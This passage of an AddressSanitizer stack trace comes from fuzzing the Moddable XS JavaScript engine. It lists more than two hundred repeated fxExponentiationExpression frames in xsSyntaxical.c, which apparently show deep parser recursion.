fxPostfixExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1938 #10 0x634a86 in fxPrefixExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1933 #11 0x63444b in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1872 #12 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #13 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #14 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #15 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #16 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #17 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #18 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #19 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #20 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #21 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #22 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #23 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #24 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #25 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #26 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #27 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #28 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #29 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #30 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #31 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #32 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #33 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #34 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #35 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #36 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #37 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #38 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #39 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #40 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #41 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #42 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #43 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #44 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #45 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #46 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #47 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #48 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #49 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #50 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #51 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #52 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #53 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #54 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #55 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #56 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #57 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #58 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #59 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #60 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #61 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #62 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #63 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #64 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #65 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #66 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #67 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #68 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #69 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #70 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #71 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #72 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #73 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #74 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #75 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #76 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #77 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #78 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #79 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #80 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #81 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #82 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #83 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #84 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #85 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #86 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #87 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #88 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #89 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #90 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #91 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #92 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #93 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #94 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #95 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #96 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #97 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #98 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #99 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #100 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #101 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #102 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #103 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #104 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #105 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #106 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #107 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #108 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #109 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #110 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #111 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #112 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #113 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #114 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #115 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #116 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #117 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #118 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #119 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #120 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #121 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #122 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #123 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #124 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #125 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #126 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #127 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #128 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #129 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #130 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #131 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #132 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #133 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #134 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #135 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #136 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #137 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #138 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #139 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #140 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #141 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #142 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #143 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #144 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #145 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #146 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #147 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #148 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #149 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #150 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #151 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #152 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #153 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #154 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #155 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #156 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #157 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #158 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #159 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #160 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #161 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #162 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #163 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #164 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #165 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #166 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #167 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #168 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #169 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #170 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #171 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #172 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #173 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #174 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #175 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #176 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #177 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #178 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #179 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #180 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #181 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #182 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #183 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #184 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #185 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #186 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #187 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #188 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #189 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #190 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #191 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #192 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #193 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #194 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #195 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #196 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #197 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #198 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #199 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #200 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #201 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #202 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #203 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #204 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #205 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #206 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #207 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #208 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #209 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #210 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #211 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #212 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #213 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #214 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #215 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #216 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #217 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #218 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #219 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #220 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #221 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #222 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #223 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #224 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #225 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #226 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #227 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #228 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #229 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #230 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #231 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #232 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #233 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #234 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #235 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #236 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #237 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #238 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 #239 0x6344f6 in fxExponentiationExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1877 